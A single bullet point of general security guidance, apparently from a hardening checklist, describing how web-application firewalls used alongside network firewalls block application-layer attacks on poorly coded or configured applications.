  • Web-application firewalls filter and block non-essential traffic at the application layer. Used in conjunction with a network-based firewall, a properly configured web-application firewall prevents application-layer attacks if applications are improperly coded or configured.
